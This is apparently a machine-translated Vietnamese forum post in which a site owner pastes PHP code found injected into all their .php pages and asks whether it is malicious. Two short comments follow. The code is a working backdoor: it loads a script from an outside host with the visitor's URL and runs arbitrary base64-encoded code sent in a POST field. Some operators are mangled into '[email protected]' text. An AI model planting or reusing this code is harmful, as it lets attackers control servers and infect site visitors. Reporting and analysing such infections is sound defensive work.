Có thể ai đó Hãy tư vấn cho mã php này sẽ làm gì? tôi có php tìm thấy mã này trên mỗi trang .php chỉ, các trang khác như js/css/php.ini họ là tốt .. là mã độc này? nếu có xin vui lòng đề nghị làm thế nào để ngăn chặn chúng?Tập lệnh php này sẽ làm gì? nó có phải là mã php độc hại không?
Đây là Bộ luật,
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if([email protected]$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
Bạn nhận mã này bằng cách nào? Các tệp PHP của bạn đã được sửa đổi mà bạn không biết? – Ali
Hi Ali, tôi chỉ cần mở FileZila FTP, sau đó thấy rằng mỗi trang php được sửa đổi lần cuối lúc 14-September-2011 4:01:14 AM (Giờ Ấn Độ) sau đó tôi mở tập tin và tìm thấy mã này. nó thực sự kỳ lạ. – DBTutor
Trang của tôi cũng có tệp này ... – Pinch